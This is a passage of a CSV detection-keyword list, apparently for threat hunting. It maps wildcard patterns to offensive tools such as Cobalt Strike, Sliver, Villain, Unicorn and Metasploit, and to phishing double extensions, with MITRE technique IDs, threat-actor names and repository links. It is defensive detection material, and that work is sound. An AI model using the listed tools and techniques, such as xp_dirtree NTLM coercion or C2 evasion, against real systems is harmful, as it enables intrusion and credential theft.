Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.store.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.striker.local*,offensive_tool_keyword,Striker,Striker is a simple Command and Control (C2) program.,T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/4g3nt47/Striker,1,1,N/A,10,10,279,43,2023-05-04T18:00:05Z,2022-09-07T10:09:41Z -*.support.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.torproject.org/*/download/tor/*,offensive_tool_keyword,torproject,Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.,T1090 - T1134 - T1188 - T1307 - T1497 - T1560,TA0001 - TA0002 - TA0005 - TA0011,N/A,N/A,Data Exfiltration,torproject.org,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.txt shellcode hta*,offensive_tool_keyword,unicorn,Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory,T1059.001 - T1055.012 - T1027.002 - T1547.009,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/trustedsec/unicorn,1,0,N/A,N/A,10,3503,839,2023-09-15T05:43:27Z,2013-06-19T08:38:06Z -*.txt shellcode macro*,offensive_tool_keyword,unicorn,Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory,T1059.001 - T1055.012 - T1027.002 - T1547.009,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/trustedsec/unicorn,1,0,N/A,N/A,10,3503,839,2023-09-15T05:43:27Z,2013-06-19T08:38:06Z -*.txt shellcode ms*,offensive_tool_keyword,unicorn,Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory,T1059.001 - T1055.012 - T1027.002 - T1547.009,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/trustedsec/unicorn,1,0,N/A,N/A,10,3503,839,2023-09-15T05:43:27Z,2013-06-19T08:38:06Z -*.txt.bat*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.txt.dll*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.txt.exe*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.txt.htm*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.txt.jar*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.txt.js*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.txt.sfx*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.txt.vbs*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.unconstrained.txt*,offensive_tool_keyword,msldapdump,LDAP enumeration tool implemented in Python3,T1018 - T1210.001,TA0007 - TA0001,N/A,N/A,Reconnaissance,https://github.com/dievus/msLDAPDump,1,1,N/A,N/A,3,205,27,2023-08-14T13:15:29Z,2022-12-30T23:35:40Z -*.videos.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.villain_core*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*.vpn.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.webmail.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.wiki.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.win10.config.fireeye*,offensive_tool_keyword,commando-vm,CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.,T1059 - T1053 - T1055 - T1070,TA0002 - TA0004 - TA0008,N/A,N/A,Exploitation OS,https://github.com/mandiant/commando-vm,1,1,N/A,N/A,10,6323,1248,2023-10-03T19:02:49Z,2019-03-26T22:36:32Z -*.win7.config.fireeye*,offensive_tool_keyword,commando-vm,CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.,T1059 - T1053 - T1055 - T1070,TA0002 - TA0004 - TA0008,N/A,N/A,Exploitation OS,https://github.com/mandiant/commando-vm,1,1,N/A,N/A,10,6323,1248,2023-10-03T19:02:49Z,2019-03-26T22:36:32Z -*.xls.bat*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.xls.dll*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.xls.exe*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.xls.htm*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.xls.jar*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.xls.js*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.xls.sfx*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.xls.vbs*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.xlsx.bat*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.xlsx.dll*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.xlsx.exe*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.xlsx.htm*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.xlsx.jar*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.xlsx.js*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.xlsx.sfx*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.xlsx.vbs*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.xp_dirtree *\*,offensive_tool_keyword,AD exploitation cheat sheet,If you have low-privileged access to a MSSQL database and no links are present you could potentially force NTLM authentication by using the xp_dirtree stored procedure to access this share. If this is successful the NetNTLM for the SQL service account can be collected and potentially cracked or relayed to compromise machines as that service account.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/#kali-installer-images*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/*_priv_esc.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/*SandboxEscapes/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/../../../../../boot.ini*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*/.aggressor.prop*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*/.cme/cme.conf*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/.exegol/*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/.local/share/pacu/*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*/.manspider/logs*,offensive_tool_keyword,MANSPIDER,Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!,T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083,TA0007 - TA0009 - TA0010,N/A,N/A,Discovery,https://github.com/blacklanternsecurity/MANSPIDER,1,0,N/A,8,8,772,119,2023-10-03T03:50:49Z,2020-03-18T13:27:20Z -*/.manspider/loot*,offensive_tool_keyword,MANSPIDER,Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!,T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083,TA0007 - TA0009 - TA0010,N/A,N/A,Discovery,https://github.com/blacklanternsecurity/MANSPIDER,1,0,N/A,8,8,772,119,2023-10-03T03:50:49Z,2020-03-18T13:27:20Z -*/.msf4/*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*/.ntdissector*,offensive_tool_keyword,ntdissector,Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.,T1003.003,TA0006 ,N/A,N/A,Credential Access,https://github.com/synacktiv/ntdissector,1,0,N/A,9,1,73,6,2023-10-03T14:17:00Z,2023-09-05T12:13:47Z -*/.sliver/logs*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*/.ssh/RAI.pub*,offensive_tool_keyword,cobaltstrike,Rapid Attack Infrastructure (RAI),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/obscuritylabs/RAI,1,1,N/A,10,10,283,53,2021-10-06T17:44:19Z,2018-02-12T16:23:23Z -*//:ptth*,offensive_tool_keyword,powershell,powershell obfuscations techniques observed by malwares - reversed http://,T1021 - T1024 - T1027 - T1035 - T1059 - T1070,TA0001 - TA0002 - TA0003 - TA0005 - TA0006,Qakbot,N/A,Defense Evasion,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*//:sptth*,offensive_tool_keyword,powershell,powershell obfuscations techniques observed by malwares - reversed https://,T1021 - T1024 - T1027 - T1035 - T1059 - T1070,TA0001 - TA0002 - TA0003 - TA0005 - TA0006,Qakbot,N/A,Defense Evasion,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*//crack.sh/get-cracking/*,offensive_tool_keyword,crack.sh,crack.sh THE WORLD???S FASTEST DES CRACKER. Used by attackers to submit passwords to crack,T1110.002 - T1021.002,TA0006 - TA0008,N/A,N/A,Credential Access,https://crack.sh/get-cracking/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*//Lh0St/InJ3C*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*//localhost:1337*,offensive_tool_keyword,empire,Starkiller is a Frontend for Powershell Empire. It is a web application written in VueJS,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 